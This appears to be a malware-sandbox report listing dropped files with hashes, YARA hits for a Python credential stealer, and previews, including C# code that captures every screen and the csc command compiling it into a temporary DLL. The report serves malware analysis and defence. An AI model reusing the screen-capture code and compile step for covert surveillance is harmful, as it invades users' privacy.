                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                                                                                        Entropy (8bit):3.111742667693586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grylak7Ynqq5PN5Dlq5J:+RI+ycuZhN3akS5PNnqX
                                                                                                                                                                                                                                        MD5:E8796A8519AB83071DCB37AF7409968E
                                                                                                                                                                                                                                        SHA1:7CF86E87A7A2111E4F0C92CAA237176D6D983EF0
                                                                                                                                                                                                                                        SHA-256:8BADD01D143380B3129B85F0AF47219B369FD720891AB010AF52F79256A5595E
                                                                                                                                                                                                                                        SHA-512:79B22CF7B251FE7B00176C3D9A96F511ECFE59364A2246B61197D64AFB7D2D98E52600D038B2BC978A734C3DA50BB2AC62D6C0CFF72E9241FA0E344FCC31E376
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.j.h.g.m.e.x.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.j.h.g.m.e.x.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1004
                                                                                                                                                                                                                                        Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                        MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                        SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                        SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                        SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):605
                                                                                                                                                                                                                                        Entropy (8bit):5.402047841013756
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikLZh0WZE3Z7:V3ka6KOkqeFkl3EJ7
                                                                                                                                                                                                                                        MD5:A47B13AA760E0B5628D18CDE7B249D6E
                                                                                                                                                                                                                                        SHA1:6BF21ABD3AC54CAB7AA5836837FF58AF18697E30
                                                                                                                                                                                                                                        SHA-256:32536B9399C820F852948B1C7EAA913B3D87ED1677304DC808F24A60C71EE50C
                                                                                                                                                                                                                                        SHA-512:6B3E60600C285F2C39BEDCF971AE71565FC6DB0DE9533D53DAFE7FE599FBBF71652C3DBDD09B80638DA1981C3573498779A883DE9DC045305C9E59C587309A69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.0.cs"
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4096
                                                                                                                                                                                                                                        Entropy (8bit):3.160106293721571
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:667oEAtf0KhzBU/9f6mtJKN0lpW1ul3a37q:+Nz0EmSOd1K
                                                                                                                                                                                                                                        MD5:4375FAB82D4BCAA367426B58F66079FD
                                                                                                                                                                                                                                        SHA1:FD7797070BFB34238CAAB7D834317AEB81CEB4CC
                                                                                                                                                                                                                                        SHA-256:D230A9541953213366A051064A18570D09C77ACBDFB9062F262CBD1C49A2AE35
                                                                                                                                                                                                                                        SHA-512:799224E7DC4C31B84EDDE403A91A071124E1232D2148405DA884473AE88833E7930A12C1378E6569DDD8A74913FBFCDEF4930DC5D037A2AA86A74D7E37D212F6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(7g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (731), with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1152
                                                                                                                                                                                                                                        Entropy (8bit):5.490937268098361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:KgtmkId3ka6KOkqeFkl3EJ6Kax5DqBVKVrdFAMBJTH:Jtxkka6NkqeFkl3EJ6K2DcVKdBJj
                                                                                                                                                                                                                                        MD5:A32101351599A2E1FB06FD507D14BCBB
                                                                                                                                                                                                                                        SHA1:261B78F0A0E8020C62170F429E3D95DA16E88FFE
                                                                                                                                                                                                                                        SHA-256:D10E3B17D9551666229F93202BEC17B3C860C7B1B124AF2472D0F7B9B28505DC
                                                                                                                                                                                                                                        SHA-512:FE9B272FBD7A4D9FF38C55094ACC149D7A11546C691E19707616AFEF6A19AA1E11558F6C915BE60BE2009BF28AFF0BFB07145CCEE111661D6CCBB740587002C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24189952
                                                                                                                                                                                                                                        Entropy (8bit):6.346346908201171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:CFUine3T2HszWM/LvOrN6hC0lxy6D5DKJBlZGODSr1YQaxLaIaiFrEF9o31g6d6T:lD+SWKOr4CeXDuHwODSw6uc
                                                                                                                                                                                                                                        MD5:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        SHA1:CEB0FE13317E7EF87377D385E9CF869343958971
                                                                                                                                                                                                                                        SHA-256:6D350FD6D807F267F5B615CF5937DABB99E5F30ED3B3310E1BF2AA2A34F93F8E
                                                                                                                                                                                                                                        SHA-512:9CDC43BCE53CC6B9A388B9FB50BF81DB413432BEB0B607D14942DB6CEDDCEEB38CBEB9896916BF73A72E06731D16755F20A475523BE63177996A3D9BCDD6FA0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................N..........0[.....0......0......0...................y....7.......7.....Rich...................PE..d...7s6g.........."....(.....X......0..........@..............................w...........`..................................................l..<.......8.......t;............w.(...PY...............................X..@............................................text.............................. ..`.rdata..............................@..@.data...............................@....pdata..t;.......<..."..............@..@.rsrc...8............^..............@..@.reloc..(.....w.......q.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.186171767195339
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:a2icaMc9070S1Qx+gTKnEzBIPOnr07SyLLDPx:a2icrcj2Qx+gTOEzBIPOnYxXx
                                                                                                                                                                                                                                        MD5:79F71C92C850B2D0F5E39128A59054F1
                                                                                                                                                                                                                                        SHA1:A773E62FA5DF1373F08FEAA1FB8FA1B6D5246252
                                                                                                                                                                                                                                        SHA-256:0237739399DB629FDD94DE209F19AC3C8CD74D48BEBE40AD8EA6AC7556A51980
                                                                                                                                                                                                                                        SHA-512:3FDEF4C04E7D89D923182E3E48D4F3D866204E878ABCAACFF657256F054AEAFAFDD352B5A55EA3864A090D01169EC67B52C7F944E02247592417D78532CC5171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../T..A...A...A.......A...@...A...D...A...E...A...B...A.~.@...A...@...A...@.2.A.~.L...A.~.A...A.~.....A.~.C...A.Rich..A.........PE..d......d.........." ...".R..........`.....................................................`.............................................P...`...d......................../..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):820736
                                                                                                                                                                                                                                        Entropy (8bit):6.056263694016779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                                                                                                                                                                                                        MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                                                                                                                                                                                                        SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                                                                                                                                                                                                        SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                                                                                                                                                                                                        SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ls...........u......q......u......q......q......q.....Yq...........Hp.....Hp.....Hp.....Hp.....Rich............................PE..d......d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84760
                                                                                                                                                                                                                                        Entropy (8bit):6.570831353064175
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                                                                                                                                                                                                        MD5:3859239CED9A45399B967EBCE5A6BA23
                                                                                                                                                                                                                                        SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                                                                                                                                                                                                        SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                                                                                                                                                                                                        SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A}...............d`.....J`......J`......J`......J`......J`.......`......Nd..........Z....`.......`.......`.......`......Rich............PE..d......d.........." ...".....^......L........................................P.......`....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):181760
                                                                                                                                                                                                                                        Entropy (8bit):6.176962076839488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                                                                        MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                                                                        SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                                                                        SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                                                                        SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):123664
                                                                                                                                                                                                                                        Entropy (8bit):6.058417150946148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                                                                                                                                                                                                        MD5:BD36F7D64660D120C6FB98C8F536D369
                                                                                                                                                                                                                                        SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                                                                                                                                                                                                        SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                                                                                                                                                                                                        SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..$Z...&...^...&...^...&..-Z...&...&...&..$Z...&..$Z...&..$Zv..&..$Z...&..Rich.&..........................PE..d...!..d.........." ..."............p\..............................................|o....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253200
                                                                                                                                                                                                                                        Entropy (8bit):6.559097478184273
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                                                                                                                                                                                                        MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                                                                                                                                                                                                        SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                                                                                                                                                                                                        SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                                                                                                                                                                                                        SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nyR.............w.......s.......s.......s.......s.......s.......w.........._....s.......s.......s.......s.......s......Rich............PE..d......d.........." ...".v...<......L...............................................Rn....`..........................................T..P...`T...................&......./......P.......T...........................P...@............................................text....u.......v.................. ..`.rdata..<............z..............@..@.data....*...p...$...R..............@....pdata...&.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.222786912280051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                                                                                                                                                                                                        MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                                                                                                                                                                                                        SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                                                                                                                                                                                                        SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                                                                                                                                                                                                        SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.u.'.&.'.&.'.&._,&.'.&.[.'.'.&.[.'.'.&.[.'.'.&.[.'.'.&._.'.'.&*[.'.'.&.'.&e'.&*[.'.'.&*[.'.'.&*[@&.'.&*[.'.'.&Rich.'.&........PE..d......d.........." ...".T...~......`?...............................................%....`.............................................P.......................,......../......\...0}..T............................{..@............p..(............................text...uR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):158992
                                                                                                                                                                                                                                        Entropy (8bit):6.8491146526380025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                                                                                                                                                                                                        MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                                                                                                                                                                                                        SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                                                                                                                                                                                                        SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                                                                                                                                                                                                        SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
